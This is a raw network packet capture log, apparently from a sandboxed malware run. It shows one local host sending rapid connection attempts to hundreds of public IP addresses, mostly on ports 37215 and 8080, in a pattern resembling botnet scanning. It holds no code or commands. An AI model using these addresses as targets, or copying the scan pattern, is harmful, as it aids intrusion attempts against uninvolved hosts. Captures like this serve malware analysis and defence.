                                                              Nov 13, 2023 22:18:00.676080942 CET1266037215192.168.2.23157.91.242.73
                                                              Nov 13, 2023 22:18:00.676093102 CET1266037215192.168.2.23157.109.226.161
                                                              Nov 13, 2023 22:18:00.676106930 CET1266037215192.168.2.23157.6.22.169
                                                              Nov 13, 2023 22:18:00.676136971 CET1266037215192.168.2.23157.170.31.230
                                                              Nov 13, 2023 22:18:00.676150084 CET1266037215192.168.2.23157.47.87.131
                                                              Nov 13, 2023 22:18:00.676186085 CET1266037215192.168.2.23157.212.199.39
                                                              Nov 13, 2023 22:18:00.676207066 CET1266037215192.168.2.23157.152.71.204
                                                              Nov 13, 2023 22:18:00.676207066 CET1266037215192.168.2.23157.197.247.121
                                                              Nov 13, 2023 22:18:00.676207066 CET1266037215192.168.2.23157.67.7.45
                                                              Nov 13, 2023 22:18:00.676230907 CET1266037215192.168.2.23157.248.180.6
                                                              Nov 13, 2023 22:18:00.676246881 CET1266037215192.168.2.23157.54.149.255
                                                              Nov 13, 2023 22:18:00.676259995 CET1266037215192.168.2.23157.13.141.188
                                                              Nov 13, 2023 22:18:00.676284075 CET1266037215192.168.2.23157.153.115.22
                                                              Nov 13, 2023 22:18:00.676297903 CET1266037215192.168.2.23157.162.194.221
                                                              Nov 13, 2023 22:18:00.676311970 CET1266037215192.168.2.23157.192.170.149
                                                              Nov 13, 2023 22:18:00.676316023 CET1266037215192.168.2.23157.34.81.3
                                                              Nov 13, 2023 22:18:00.676326990 CET1266037215192.168.2.23157.54.190.69
                                                              Nov 13, 2023 22:18:00.676336050 CET1266037215192.168.2.23157.65.7.98
                                                              Nov 13, 2023 22:18:00.687669992 CET80804261294.120.235.36192.168.2.23
                                                              Nov 13, 2023 22:18:00.687764883 CET426128080192.168.2.2394.120.235.36
                                                              Nov 13, 2023 22:18:00.687822104 CET139488080192.168.2.2362.123.156.124
                                                              Nov 13, 2023 22:18:00.687833071 CET139488080192.168.2.2394.72.166.25
                                                              Nov 13, 2023 22:18:00.687844038 CET139488080192.168.2.2395.159.80.171
                                                              Nov 13, 2023 22:18:00.687845945 CET139488080192.168.2.2394.219.41.246
                                                              Nov 13, 2023 22:18:00.687853098 CET139488080192.168.2.2331.146.115.202
                                                              Nov 13, 2023 22:18:00.687855005 CET139488080192.168.2.2394.24.65.94
                                                              Nov 13, 2023 22:18:00.687856913 CET139488080192.168.2.2362.157.1.168
                                                              Nov 13, 2023 22:18:00.687858105 CET139488080192.168.2.2394.157.35.229
                                                              Nov 13, 2023 22:18:00.687879086 CET139488080192.168.2.2395.116.142.64
                                                              Nov 13, 2023 22:18:00.687879086 CET139488080192.168.2.2395.233.64.31
                                                              Nov 13, 2023 22:18:00.687879086 CET139488080192.168.2.2385.126.242.102
                                                              Nov 13, 2023 22:18:00.687894106 CET139488080192.168.2.2362.23.68.180
                                                              Nov 13, 2023 22:18:00.687894106 CET139488080192.168.2.2395.227.18.42
                                                              Nov 13, 2023 22:18:00.687896967 CET139488080192.168.2.2331.210.102.254
                                                              Nov 13, 2023 22:18:00.687896967 CET139488080192.168.2.2362.141.207.125
                                                              Nov 13, 2023 22:18:00.687901974 CET139488080192.168.2.2394.217.249.106
                                                              Nov 13, 2023 22:18:00.687905073 CET139488080192.168.2.2385.212.172.168
                                                              Nov 13, 2023 22:18:00.687906027 CET139488080192.168.2.2395.113.227.177
                                                              Nov 13, 2023 22:18:00.687912941 CET139488080192.168.2.2394.100.221.212
                                                              Nov 13, 2023 22:18:00.687913895 CET139488080192.168.2.2385.7.173.117
                                                              Nov 13, 2023 22:18:00.687920094 CET139488080192.168.2.2331.133.43.194
                                                              Nov 13, 2023 22:18:00.687935114 CET139488080192.168.2.2331.145.221.137
                                                              Nov 13, 2023 22:18:00.687937975 CET139488080192.168.2.2394.118.67.249
                                                              Nov 13, 2023 22:18:00.687942982 CET139488080192.168.2.2394.74.57.142
                                                              Nov 13, 2023 22:18:00.687952995 CET139488080192.168.2.2394.58.117.220
                                                              Nov 13, 2023 22:18:00.687954903 CET139488080192.168.2.2394.86.77.157
                                                              Nov 13, 2023 22:18:00.687963009 CET139488080192.168.2.2385.245.195.121
                                                              Nov 13, 2023 22:18:00.687969923 CET139488080192.168.2.2394.8.64.84
                                                              Nov 13, 2023 22:18:00.687977076 CET139488080192.168.2.2395.127.212.187
                                                              Nov 13, 2023 22:18:00.687978983 CET139488080192.168.2.2362.205.197.1
                                                              Nov 13, 2023 22:18:00.687994003 CET139488080192.168.2.2385.86.78.6
                                                              Nov 13, 2023 22:18:00.687999010 CET139488080192.168.2.2385.136.29.66
                                                              Nov 13, 2023 22:18:00.687999964 CET139488080192.168.2.2395.108.26.208
                                                              Nov 13, 2023 22:18:00.687999964 CET139488080192.168.2.2362.138.190.11
                                                              Nov 13, 2023 22:18:00.688009024 CET139488080192.168.2.2385.197.129.208
                                                              Nov 13, 2023 22:18:00.688009024 CET139488080192.168.2.2385.83.185.10
                                                              Nov 13, 2023 22:18:00.688010931 CET139488080192.168.2.2362.224.136.113
                                                              Nov 13, 2023 22:18:00.688020945 CET139488080192.168.2.2362.209.95.205
                                                              Nov 13, 2023 22:18:00.688021898 CET139488080192.168.2.2385.25.174.15
                                                              Nov 13, 2023 22:18:00.688021898 CET139488080192.168.2.2385.60.111.0
                                                              Nov 13, 2023 22:18:00.688020945 CET139488080192.168.2.2331.167.34.96
                                                              Nov 13, 2023 22:18:00.688024044 CET139488080192.168.2.2331.169.31.33
                                                              Nov 13, 2023 22:18:00.688030005 CET139488080192.168.2.2395.59.68.229
                                                              Nov 13, 2023 22:18:00.688030958 CET139488080192.168.2.2331.113.110.84
                                                              Nov 13, 2023 22:18:00.688043118 CET139488080192.168.2.2331.204.228.1
                                                              Nov 13, 2023 22:18:00.688046932 CET139488080192.168.2.2395.112.170.224
                                                              Nov 13, 2023 22:18:00.688055992 CET139488080192.168.2.2394.34.224.54
                                                              Nov 13, 2023 22:18:00.688055992 CET139488080192.168.2.2362.86.215.15
                                                              Nov 13, 2023 22:18:00.688060045 CET139488080192.168.2.2394.0.33.84
                                                              Nov 13, 2023 22:18:00.688067913 CET139488080192.168.2.2385.181.17.93
                                                              Nov 13, 2023 22:18:00.688083887 CET139488080192.168.2.2385.81.121.119
                                                              Nov 13, 2023 22:18:00.688090086 CET139488080192.168.2.2362.245.66.196
                                                              Nov 13, 2023 22:18:00.688100100 CET139488080192.168.2.2395.66.165.43
                                                              Nov 13, 2023 22:18:00.688108921 CET139488080192.168.2.2395.137.194.194
                                                              Nov 13, 2023 22:18:00.688112020 CET139488080192.168.2.2362.78.92.201
                                                              Nov 13, 2023 22:18:00.688113928 CET139488080192.168.2.2385.17.132.208
                                                              Nov 13, 2023 22:18:00.688119888 CET139488080192.168.2.2394.98.34.78
                                                              Nov 13, 2023 22:18:00.688119888 CET139488080192.168.2.2395.147.244.109
                                                              Nov 13, 2023 22:18:00.688122034 CET139488080192.168.2.2362.170.109.90
                                                              Nov 13, 2023 22:18:00.688122988 CET139488080192.168.2.2385.197.20.108
                                                              Nov 13, 2023 22:18:00.688134909 CET139488080192.168.2.2331.73.56.112
                                                              Nov 13, 2023 22:18:00.688142061 CET139488080192.168.2.2394.79.67.78
                                                              Nov 13, 2023 22:18:00.688143015 CET139488080192.168.2.2331.252.188.21
                                                              Nov 13, 2023 22:18:00.688146114 CET139488080192.168.2.2395.169.196.249
                                                              Nov 13, 2023 22:18:00.688154936 CET139488080192.168.2.2394.195.189.211
                                                              Nov 13, 2023 22:18:00.688157082 CET139488080192.168.2.2395.206.1.211
                                                              Nov 13, 2023 22:18:00.688158035 CET139488080192.168.2.2331.112.192.132
                                                              Nov 13, 2023 22:18:00.688169956 CET139488080192.168.2.2394.19.125.211
                                                              Nov 13, 2023 22:18:00.688177109 CET139488080192.168.2.2394.73.135.92
                                                              Nov 13, 2023 22:18:00.688177109 CET139488080192.168.2.2395.26.148.13
                                                              Nov 13, 2023 22:18:00.688195944 CET139488080192.168.2.2395.72.38.6
                                                              Nov 13, 2023 22:18:00.688195944 CET139488080192.168.2.2331.105.64.193
                                                              Nov 13, 2023 22:18:00.688199997 CET139488080192.168.2.2331.149.242.197
                                                              Nov 13, 2023 22:18:00.688203096 CET139488080192.168.2.2394.51.194.127
                                                              Nov 13, 2023 22:18:00.688209057 CET139488080192.168.2.2385.49.139.64
                                                              Nov 13, 2023 22:18:00.688218117 CET139488080192.168.2.2331.71.169.238
                                                              Nov 13, 2023 22:18:00.688218117 CET139488080192.168.2.2331.119.38.194
                                                              Nov 13, 2023 22:18:00.688218117 CET139488080192.168.2.2394.235.209.219
                                                              Nov 13, 2023 22:18:00.688255072 CET139488080192.168.2.2331.95.137.18
                                                              Nov 13, 2023 22:18:00.688255072 CET139488080192.168.2.2385.64.112.214
                                                              Nov 13, 2023 22:18:00.688256025 CET139488080192.168.2.2331.130.62.146
                                                              Nov 13, 2023 22:18:00.688256979 CET139488080192.168.2.2385.161.207.38
                                                              Nov 13, 2023 22:18:00.688256979 CET139488080192.168.2.2395.68.153.194
                                                              Nov 13, 2023 22:18:00.688256979 CET139488080192.168.2.2362.108.78.15
                                                              Nov 13, 2023 22:18:00.688256979 CET139488080192.168.2.2331.184.240.31
                                                              Nov 13, 2023 22:18:00.688261032 CET139488080192.168.2.2395.154.9.186
                                                              Nov 13, 2023 22:18:00.688261032 CET139488080192.168.2.2395.220.137.212
                                                              Nov 13, 2023 22:18:00.688261032 CET139488080192.168.2.2331.95.201.223
                                                              Nov 13, 2023 22:18:00.688265085 CET139488080192.168.2.2362.239.124.125
                                                              Nov 13, 2023 22:18:00.688267946 CET139488080192.168.2.2394.140.76.172
                                                              Nov 13, 2023 22:18:00.688268900 CET139488080192.168.2.2385.76.102.161
                                                              Nov 13, 2023 22:18:00.688268900 CET139488080192.168.2.2385.177.92.170
                                                              Nov 13, 2023 22:18:00.688268900 CET139488080192.168.2.2385.108.183.89
                                                              Nov 13, 2023 22:18:00.688268900 CET139488080192.168.2.2362.233.3.71
                                                              Nov 13, 2023 22:18:00.688268900 CET139488080192.168.2.2395.230.238.3
                                                              Nov 13, 2023 22:18:00.688271999 CET139488080192.168.2.2331.72.201.141
                                                              Nov 13, 2023 22:18:00.688273907 CET139488080192.168.2.2362.192.107.56
                                                              Nov 13, 2023 22:18:00.688273907 CET139488080192.168.2.2331.69.76.75
                                                              Nov 13, 2023 22:18:00.688275099 CET139488080192.168.2.2362.147.95.46
                                                              Nov 13, 2023 22:18:00.688275099 CET139488080192.168.2.2362.133.224.93
                                                              Nov 13, 2023 22:18:00.688275099 CET139488080192.168.2.2385.27.69.119
                                                              Nov 13, 2023 22:18:00.688275099 CET139488080192.168.2.2395.216.184.24
                                                              Nov 13, 2023 22:18:00.688275099 CET139488080192.168.2.2362.185.45.161
                                                              Nov 13, 2023 22:18:00.688275099 CET139488080192.168.2.2394.132.138.173
                                                              Nov 13, 2023 22:18:00.688275099 CET139488080192.168.2.2394.103.120.39
                                                              Nov 13, 2023 22:18:00.688275099 CET139488080192.168.2.2385.24.154.97
                                                              Nov 13, 2023 22:18:00.688275099 CET139488080192.168.2.2395.19.100.208
                                                              Nov 13, 2023 22:18:00.688283920 CET139488080192.168.2.2394.75.105.59
                                                              Nov 13, 2023 22:18:00.688283920 CET139488080192.168.2.2331.42.54.252
                                                              Nov 13, 2023 22:18:00.688294888 CET139488080192.168.2.2331.53.81.83
                                                              Nov 13, 2023 22:18:00.688309908 CET139488080192.168.2.2394.157.56.96
                                                              Nov 13, 2023 22:18:00.688309908 CET139488080192.168.2.2362.197.124.0
                                                              Nov 13, 2023 22:18:00.688313007 CET139488080192.168.2.2331.60.19.237
                                                              Nov 13, 2023 22:18:00.688313007 CET139488080192.168.2.2395.124.202.96
                                                              Nov 13, 2023 22:18:00.688316107 CET139488080192.168.2.2395.8.5.67
                                                              Nov 13, 2023 22:18:00.688316107 CET139488080192.168.2.2395.148.210.121
                                                              Nov 13, 2023 22:18:00.688333988 CET139488080192.168.2.2331.251.228.182
                                                              Nov 13, 2023 22:18:00.688333988 CET139488080192.168.2.2362.14.35.38
                                                              Nov 13, 2023 22:18:00.688338995 CET139488080192.168.2.2385.5.197.130
                                                              Nov 13, 2023 22:18:00.688338995 CET139488080192.168.2.2362.14.121.22
                                                              Nov 13, 2023 22:18:00.688338995 CET139488080192.168.2.2362.91.169.178
                                                              Nov 13, 2023 22:18:00.688350916 CET139488080192.168.2.2331.12.152.50
                                                              Nov 13, 2023 22:18:00.688353062 CET139488080192.168.2.2385.34.186.131
                                                              Nov 13, 2023 22:18:00.688354969 CET139488080192.168.2.2385.66.216.178
                                                              Nov 13, 2023 22:18:00.688354969 CET139488080192.168.2.2394.77.238.161
                                                              Nov 13, 2023 22:18:00.688364983 CET139488080192.168.2.2362.96.203.213
                                                              Nov 13, 2023 22:18:00.688364983 CET139488080192.168.2.2385.74.242.118
                                                              Nov 13, 2023 22:18:00.688369036 CET139488080192.168.2.2395.58.119.179
                                                              Nov 13, 2023 22:18:00.688384056 CET139488080192.168.2.2362.230.20.10
                                                              Nov 13, 2023 22:18:00.688384056 CET139488080192.168.2.2395.160.126.29
                                                              Nov 13, 2023 22:18:00.688384056 CET139488080192.168.2.2394.28.28.0
                                                              Nov 13, 2023 22:18:00.688386917 CET139488080192.168.2.2331.160.62.83
                                                              Nov 13, 2023 22:18:00.688386917 CET139488080192.168.2.2385.92.228.217
                                                              Nov 13, 2023 22:18:00.688390017 CET139488080192.168.2.2394.74.75.66
                                                              Nov 13, 2023 22:18:00.688394070 CET139488080192.168.2.2385.86.253.203
                                                              Nov 13, 2023 22:18:00.688400030 CET139488080192.168.2.2385.64.183.16
                                                              Nov 13, 2023 22:18:00.688400030 CET139488080192.168.2.2385.134.125.34
                                                              Nov 13, 2023 22:18:00.688400030 CET139488080192.168.2.2362.70.3.72
                                                              Nov 13, 2023 22:18:00.688405991 CET139488080192.168.2.2385.176.70.19
                                                              Nov 13, 2023 22:18:00.688405991 CET139488080192.168.2.2395.1.84.191
                                                              Nov 13, 2023 22:18:00.688407898 CET139488080192.168.2.2385.144.76.213
                                                              Nov 13, 2023 22:18:00.688411951 CET139488080192.168.2.2362.35.101.221
                                                              Nov 13, 2023 22:18:00.688411951 CET139488080192.168.2.2385.137.207.216
                                                              Nov 13, 2023 22:18:00.688431978 CET139488080192.168.2.2331.10.255.79
                                                              Nov 13, 2023 22:18:00.688431978 CET139488080192.168.2.2331.9.47.49
                                                              Nov 13, 2023 22:18:00.688433886 CET139488080192.168.2.2331.86.3.134
                                                              Nov 13, 2023 22:18:00.688433886 CET139488080192.168.2.2362.26.199.220
                                                              Nov 13, 2023 22:18:00.688436031 CET139488080192.168.2.2394.4.83.94
                                                              Nov 13, 2023 22:18:00.688438892 CET139488080192.168.2.2394.175.167.184
                                                              Nov 13, 2023 22:18:00.688438892 CET139488080192.168.2.2362.26.200.199
                                                              Nov 13, 2023 22:18:00.688446045 CET139488080192.168.2.2362.121.130.167
                                                              Nov 13, 2023 22:18:00.688457012 CET139488080192.168.2.2394.188.137.157
                                                              Nov 13, 2023 22:18:00.688467026 CET139488080192.168.2.2395.165.243.221
                                                              Nov 13, 2023 22:18:00.688467979 CET139488080192.168.2.2394.141.59.99
                                                              Nov 13, 2023 22:18:00.688467979 CET139488080192.168.2.2331.223.167.158
                                                              Nov 13, 2023 22:18:00.688484907 CET139488080192.168.2.2395.23.245.1
                                                              Nov 13, 2023 22:18:00.688489914 CET139488080192.168.2.2395.240.26.221
                                                              Nov 13, 2023 22:18:00.688488007 CET139488080192.168.2.2385.137.68.26
                                                              Nov 13, 2023 22:18:00.688488007 CET139488080192.168.2.2331.222.158.145
                                                              Nov 13, 2023 22:18:00.688508987 CET139488080192.168.2.2385.3.61.155
                                                              Nov 13, 2023 22:18:00.688509941 CET139488080192.168.2.2394.132.65.139
                                                              Nov 13, 2023 22:18:00.688509941 CET139488080192.168.2.2331.120.50.4
                                                              Nov 13, 2023 22:18:00.688519001 CET139488080192.168.2.2395.191.219.84
                                                              Nov 13, 2023 22:18:00.688519955 CET139488080192.168.2.2331.68.21.248
                                                              Nov 13, 2023 22:18:00.688519955 CET139488080192.168.2.2362.47.33.55
                                                              Nov 13, 2023 22:18:00.688519955 CET139488080192.168.2.2395.60.35.83
                                                              Nov 13, 2023 22:18:00.688536882 CET139488080192.168.2.2395.216.62.66
                                                              Nov 13, 2023 22:18:00.688538074 CET139488080192.168.2.2385.137.182.190
                                                              Nov 13, 2023 22:18:00.688540936 CET139488080192.168.2.2331.92.45.90
                                                              Nov 13, 2023 22:18:00.688544035 CET139488080192.168.2.2362.246.95.21
                                                              Nov 13, 2023 22:18:00.688544035 CET139488080192.168.2.2331.179.16.112
                                                              Nov 13, 2023 22:18:00.688554049 CET139488080192.168.2.2331.246.222.165
                                                              Nov 13, 2023 22:18:00.688558102 CET139488080192.168.2.2331.81.97.221
                                                              Nov 13, 2023 22:18:00.688560009 CET139488080192.168.2.2394.97.124.20
                                                              Nov 13, 2023 22:18:00.688563108 CET139488080192.168.2.2362.44.58.234
                                                              Nov 13, 2023 22:18:00.688568115 CET139488080192.168.2.2385.251.231.194
                                                              Nov 13, 2023 22:18:00.688575029 CET139488080192.168.2.2331.27.196.245
                                                              Nov 13, 2023 22:18:00.688575983 CET139488080192.168.2.2394.165.215.193
                                                              Nov 13, 2023 22:18:00.688591957 CET139488080192.168.2.2331.119.241.104
                                                              Nov 13, 2023 22:18:00.688596964 CET139488080192.168.2.2385.68.34.169
                                                              Nov 13, 2023 22:18:00.688606024 CET139488080192.168.2.2362.124.35.153
                                                              Nov 13, 2023 22:18:00.688611984 CET139488080192.168.2.2362.9.134.218
                                                              Nov 13, 2023 22:18:00.688611984 CET139488080192.168.2.2331.40.71.74
                                                              Nov 13, 2023 22:18:00.688613892 CET139488080192.168.2.2395.190.76.33
                                                              Nov 13, 2023 22:18:00.688613892 CET139488080192.168.2.2394.221.157.8
                                                              Nov 13, 2023 22:18:00.688616037 CET139488080192.168.2.2395.99.91.248
                                                              Nov 13, 2023 22:18:00.688616037 CET139488080192.168.2.2395.34.215.103
                                                              Nov 13, 2023 22:18:00.688621044 CET139488080192.168.2.2385.118.38.189
                                                              Nov 13, 2023 22:18:00.688635111 CET139488080192.168.2.2331.250.185.231
                                                              Nov 13, 2023 22:18:00.688635111 CET139488080192.168.2.2394.106.56.132
                                                              Nov 13, 2023 22:18:00.688638926 CET139488080192.168.2.2395.198.151.229
                                                              Nov 13, 2023 22:18:00.688651085 CET139488080192.168.2.2331.48.110.119
                                                              Nov 13, 2023 22:18:00.688657045 CET139488080192.168.2.2385.102.0.193
                                                              Nov 13, 2023 22:18:00.688657045 CET139488080192.168.2.2331.2.24.60
                                                              Nov 13, 2023 22:18:00.688663960 CET139488080192.168.2.2362.96.197.96
                                                              Nov 13, 2023 22:18:00.688674927 CET139488080192.168.2.2362.17.32.43
                                                              Nov 13, 2023 22:18:00.688674927 CET139488080192.168.2.2394.60.109.221
                                                              Nov 13, 2023 22:18:00.688677073 CET139488080192.168.2.2394.155.61.215
                                                              Nov 13, 2023 22:18:00.688685894 CET139488080192.168.2.2385.220.240.219
                                                              Nov 13, 2023 22:18:00.688694954 CET139488080192.168.2.2362.84.189.88
                                                              Nov 13, 2023 22:18:00.688699961 CET139488080192.168.2.2395.178.87.149
                                                              Nov 13, 2023 22:18:00.688709021 CET139488080192.168.2.2394.188.219.203
                                                              Nov 13, 2023 22:18:00.688709021 CET139488080192.168.2.2394.180.173.70
                                                              Nov 13, 2023 22:18:00.688718081 CET139488080192.168.2.2362.38.36.137
                                                              Nov 13, 2023 22:18:00.688723087 CET139488080192.168.2.2395.97.93.206
                                                              Nov 13, 2023 22:18:00.688724995 CET139488080192.168.2.2362.226.113.243
                                                              Nov 13, 2023 22:18:00.688729048 CET139488080192.168.2.2385.74.79.14
                                                              Nov 13, 2023 22:18:00.688730955 CET139488080192.168.2.2362.33.76.254
                                                              Nov 13, 2023 22:18:00.688739061 CET139488080192.168.2.2395.244.144.108
                                                              Nov 13, 2023 22:18:00.688750982 CET139488080192.168.2.2362.62.105.56
                                                              Nov 13, 2023 22:18:00.688750982 CET139488080192.168.2.2385.67.109.150
                                                              Nov 13, 2023 22:18:00.688751936 CET139488080192.168.2.2394.29.94.10
                                                              Nov 13, 2023 22:18:00.688752890 CET139488080192.168.2.2331.255.108.191
                                                              Nov 13, 2023 22:18:00.688752890 CET139488080192.168.2.2395.71.0.55
                                                              Nov 13, 2023 22:18:00.688757896 CET139488080192.168.2.2385.255.77.137
                                                              Nov 13, 2023 22:18:00.688762903 CET139488080192.168.2.2362.125.46.157
                                                              Nov 13, 2023 22:18:00.688777924 CET139488080192.168.2.2331.141.151.6
                                                              Nov 13, 2023 22:18:00.688780069 CET139488080192.168.2.2362.149.22.123
                                                              Nov 13, 2023 22:18:00.688780069 CET139488080192.168.2.2331.29.142.29
                                                              Nov 13, 2023 22:18:00.688780069 CET139488080192.168.2.2362.23.195.175
                                                              Nov 13, 2023 22:18:00.688795090 CET139488080192.168.2.2394.210.129.91
                                                              Nov 13, 2023 22:18:00.688796997 CET139488080192.168.2.2362.155.103.192
                                                              Nov 13, 2023 22:18:00.688802958 CET139488080192.168.2.2394.57.143.168
                                                              Nov 13, 2023 22:18:00.688816071 CET139488080192.168.2.2394.183.181.244
                                                              Nov 13, 2023 22:18:00.688822031 CET139488080192.168.2.2362.114.249.246
                                                              Nov 13, 2023 22:18:00.688822031 CET139488080192.168.2.2395.165.100.21
                                                              Nov 13, 2023 22:18:00.688822985 CET139488080192.168.2.2385.179.163.30
                                                              Nov 13, 2023 22:18:00.688826084 CET139488080192.168.2.2385.93.34.39
                                                              Nov 13, 2023 22:18:00.688826084 CET139488080192.168.2.2331.35.145.155
                                                              Nov 13, 2023 22:18:00.688831091 CET139488080192.168.2.2395.217.171.78
                                                              Nov 13, 2023 22:18:00.688838005 CET139488080192.168.2.2331.54.107.31
                                                              Nov 13, 2023 22:18:00.688843012 CET139488080192.168.2.2362.219.9.201
                                                              Nov 13, 2023 22:18:00.688844919 CET139488080192.168.2.2331.48.119.86
                                                              Nov 13, 2023 22:18:00.688849926 CET139488080192.168.2.2395.38.192.59
                                                              Nov 13, 2023 22:18:00.688853979 CET139488080192.168.2.2394.235.117.96
                                                              Nov 13, 2023 22:18:00.688857079 CET139488080192.168.2.2395.188.32.88
                                                              Nov 13, 2023 22:18:00.688858032 CET139488080192.168.2.2385.60.246.85
                                                              Nov 13, 2023 22:18:00.688864946 CET139488080192.168.2.2394.33.66.196
                                                              Nov 13, 2023 22:18:00.688873053 CET139488080192.168.2.2331.84.246.164
                                                              Nov 13, 2023 22:18:00.688873053 CET139488080192.168.2.2395.36.5.194
                                                              Nov 13, 2023 22:18:00.688880920 CET139488080192.168.2.2331.173.131.48
                                                              Nov 13, 2023 22:18:00.688879013 CET139488080192.168.2.2362.242.201.234
                                                              Nov 13, 2023 22:18:00.688880920 CET139488080192.168.2.2394.8.242.234
                                                              Nov 13, 2023 22:18:00.688880920 CET139488080192.168.2.2385.126.179.4
                                                              Nov 13, 2023 22:18:00.688879013 CET139488080192.168.2.2394.134.46.252
                                                              Nov 13, 2023 22:18:00.688886881 CET139488080192.168.2.2394.226.98.219
                                                              Nov 13, 2023 22:18:00.688901901 CET139488080192.168.2.2395.126.221.230
                                                              Nov 13, 2023 22:18:00.688901901 CET139488080192.168.2.2395.135.39.200
                                                              Nov 13, 2023 22:18:00.688901901 CET139488080192.168.2.2385.85.111.5
                                                              Nov 13, 2023 22:18:00.688905001 CET139488080192.168.2.2395.172.225.25
                                                              Nov 13, 2023 22:18:00.688905001 CET139488080192.168.2.2362.179.143.33
                                                              Nov 13, 2023 22:18:00.688919067 CET139488080192.168.2.2362.46.169.19
                                                              Nov 13, 2023 22:18:00.688920975 CET139488080192.168.2.2362.26.89.13
                                                              Nov 13, 2023 22:18:00.688930035 CET139488080192.168.2.2362.158.6.217
                                                              Nov 13, 2023 22:18:00.688932896 CET139488080192.168.2.2385.254.253.68
                                                              Nov 13, 2023 22:18:00.688936949 CET139488080192.168.2.2394.247.43.10
                                                              Nov 13, 2023 22:18:00.688941956 CET139488080192.168.2.2394.131.86.236
                                                              Nov 13, 2023 22:18:00.688941956 CET139488080192.168.2.2331.253.239.25
                                                              Nov 13, 2023 22:18:00.688945055 CET139488080192.168.2.2395.104.156.224
                                                              Nov 13, 2023 22:18:00.688950062 CET139488080192.168.2.2394.53.183.182
                                                              Nov 13, 2023 22:18:00.688961029 CET139488080192.168.2.2362.5.12.143
                                                              Nov 13, 2023 22:18:00.688966036 CET139488080192.168.2.2385.69.253.131
                                                              Nov 13, 2023 22:18:00.688966036 CET139488080192.168.2.2331.5.61.253
                                                              Nov 13, 2023 22:18:00.688966036 CET139488080192.168.2.2362.202.118.78
                                                              Nov 13, 2023 22:18:00.688970089 CET139488080192.168.2.2385.40.120.149
                                                              Nov 13, 2023 22:18:00.688977003 CET139488080192.168.2.2331.195.246.20
                                                              Nov 13, 2023 22:18:00.688982964 CET139488080192.168.2.2394.231.57.149
                                                              Nov 13, 2023 22:18:00.688994884 CET139488080192.168.2.2394.50.98.135
                                                              Nov 13, 2023 22:18:00.688997030 CET139488080192.168.2.2362.13.186.181
                                                              Nov 13, 2023 22:18:00.688997030 CET139488080192.168.2.2395.30.190.113
                                                              Nov 13, 2023 22:18:00.689003944 CET139488080192.168.2.2331.243.128.193
                                                              Nov 13, 2023 22:18:00.689017057 CET139488080192.168.2.2385.157.8.173
                                                              Nov 13, 2023 22:18:00.689038038 CET139488080192.168.2.2362.167.21.165
                                                              Nov 13, 2023 22:18:00.689038992 CET139488080192.168.2.2394.14.188.52
                                                              Nov 13, 2023 22:18:00.689039946 CET139488080192.168.2.2362.31.94.147
                                                              Nov 13, 2023 22:18:00.689042091 CET139488080192.168.2.2385.87.194.76
                                                              Nov 13, 2023 22:18:00.689049006 CET139488080192.168.2.2394.99.82.35
                                                              Nov 13, 2023 22:18:00.689060926 CET139488080192.168.2.2385.73.81.200
                                                              Nov 13, 2023 22:18:00.689062119 CET139488080192.168.2.2385.46.255.112
                                                              Nov 13, 2023 22:18:00.689062119 CET139488080192.168.2.2385.84.24.140
                                                              Nov 13, 2023 22:18:00.689062119 CET139488080192.168.2.2395.46.7.49
                                                              Nov 13, 2023 22:18:00.689069986 CET139488080192.168.2.2362.46.0.67
                                                              Nov 13, 2023 22:18:00.689070940 CET139488080192.168.2.2394.51.179.120
                                                              Nov 13, 2023 22:18:00.689069986 CET139488080192.168.2.2394.0.176.218
                                                              Nov 13, 2023 22:18:00.689076900 CET139488080192.168.2.2395.122.134.58
                                                              Nov 13, 2023 22:18:00.689078093 CET139488080192.168.2.2394.170.112.167
                                                              Nov 13, 2023 22:18:00.689079046 CET139488080192.168.2.2385.98.40.53
                                                              Nov 13, 2023 22:18:00.689079046 CET139488080192.168.2.2362.123.37.254
                                                              Nov 13, 2023 22:18:00.689080000 CET139488080192.168.2.2362.251.232.161
                                                              Nov 13, 2023 22:18:00.689085007 CET139488080192.168.2.2331.30.15.17
                                                              Nov 13, 2023 22:18:00.689085960 CET139488080192.168.2.2385.51.118.49
                                                              Nov 13, 2023 22:18:00.689090014 CET139488080192.168.2.2385.25.236.219
                                                              Nov 13, 2023 22:18:00.689094067 CET139488080192.168.2.2394.232.64.158
                                                              Nov 13, 2023 22:18:00.689095974 CET139488080192.168.2.2385.239.224.93
                                                              Nov 13, 2023 22:18:00.689101934 CET139488080192.168.2.2394.193.34.224
                                                              Nov 13, 2023 22:18:00.689101934 CET139488080192.168.2.2385.74.149.11
                                                              Nov 13, 2023 22:18:00.689120054 CET139488080192.168.2.2331.122.27.90
                                                              Nov 13, 2023 22:18:00.689122915 CET139488080192.168.2.2362.128.62.13
                                                              Nov 13, 2023 22:18:00.689136028 CET139488080192.168.2.2362.151.65.1
                                                              Nov 13, 2023 22:18:00.689137936 CET139488080192.168.2.2362.222.105.204
                                                              Nov 13, 2023 22:18:00.689137936 CET139488080192.168.2.2395.188.28.108
                                                              Nov 13, 2023 22:18:00.689138889 CET139488080192.168.2.2395.35.102.121
                                                              Nov 13, 2023 22:18:00.689160109 CET139488080192.168.2.2394.67.119.201
                                                              Nov 13, 2023 22:18:00.689162016 CET139488080192.168.2.2385.144.192.161
                                                              Nov 13, 2023 22:18:00.689162970 CET139488080192.168.2.2385.131.6.94
                                                              Nov 13, 2023 22:18:00.689163923 CET139488080192.168.2.2385.239.232.14
                                                              Nov 13, 2023 22:18:00.689165115 CET139488080192.168.2.2331.85.243.175
                                                              Nov 13, 2023 22:18:00.689165115 CET139488080192.168.2.2331.87.127.135
                                                              Nov 13, 2023 22:18:00.689165115 CET139488080192.168.2.2331.104.40.233
                                                              Nov 13, 2023 22:18:00.689167023 CET139488080192.168.2.2362.189.77.94
                                                              Nov 13, 2023 22:18:00.689167023 CET139488080192.168.2.2331.240.193.163
                                                              Nov 13, 2023 22:18:00.689177990 CET139488080192.168.2.2362.37.112.206
                                                              Nov 13, 2023 22:18:00.689186096 CET139488080192.168.2.2331.77.89.109
                                                              Nov 13, 2023 22:18:00.689186096 CET139488080192.168.2.2362.34.177.209
                                                              Nov 13, 2023 22:18:00.689192057 CET139488080192.168.2.2362.110.102.212
                                                              Nov 13, 2023 22:18:00.689193010 CET139488080192.168.2.2395.25.161.9
                                                              Nov 13, 2023 22:18:00.689205885 CET139488080192.168.2.2394.191.125.6
                                                              Nov 13, 2023 22:18:00.689205885 CET139488080192.168.2.2395.74.180.43
                                                              Nov 13, 2023 22:18:00.689205885 CET139488080192.168.2.2331.3.203.81
                                                              Nov 13, 2023 22:18:00.689198971 CET139488080192.168.2.2362.200.171.217
